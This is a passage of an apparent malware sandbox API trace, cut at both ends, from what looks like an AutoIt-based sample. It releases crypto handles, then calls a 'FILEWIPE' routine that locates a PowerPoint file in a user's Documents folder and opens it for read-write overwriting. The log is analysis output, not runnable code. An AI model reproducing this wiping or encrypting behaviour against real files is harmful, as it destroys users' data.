lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.331] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.331] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0036.332] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.332] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.332] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.332] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.332] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0036.332] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.340] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.340] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.340] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.344] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.344] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.344] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0036.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.344] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.344] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.344] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0036.344] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.344] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0036.344] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.344] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.344] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0036.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.345] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.345] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.345] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.345] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0036.345] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.345] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.345] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0036.345] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0036.345] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.345] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.345] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.345] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.345] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0036.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.345] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.345] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.346] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.346] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.346] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.346] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0036.346] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.346] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.346] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0036.346] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.346] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0036.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0036.346] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.346] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.346] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0036.346] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.346] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.346] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.346] FreeLibrary (hLibModule=0x754b0000) returned 1 [0036.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0036.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0036.347] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0036.347] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0036.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.347] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.349] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.350] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.351] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.351] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0036.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0036.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.351] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.352] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.352] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83fd62e0, ftCreationTime.dwHighDateTime=0x1d5be50, ftLastAccessTime.dwLowDateTime=0xd5dc2a40, ftLastAccessTime.dwHighDateTime=0x1d5beed, ftLastWriteTime.dwLowDateTime=0xd5dc2a40, ftLastWriteTime.dwHighDateTime=0x1d5beed, nFileSizeHigh=0x0, nFileSizeLow=0xcab3, dwReserved0=0x0, dwReserved1=0x777648, cFileName="N-yzi.pptx", cAlternateFileName="N-YZI~1.PPT")) returned 0x7c2240 [0036.352] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0036.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.353] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.353] CharLowerBuffW (in: lpsz="byte[51891]", cchLength=0xb | out: lpsz="byte[51891]") returned 0xb [0036.353] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.353] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0036.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.353] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.353] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0036.353] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0036.354] FreeLibrary (hLibModule=0x76b40000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0036.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0036.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0036.355] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.355] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.355] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.355] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0036.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.356] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0036.356] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\n-yzi.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0036.356] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.356] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.356] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0036.356] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.356] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.356] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.357] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.357] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.357] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.357] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 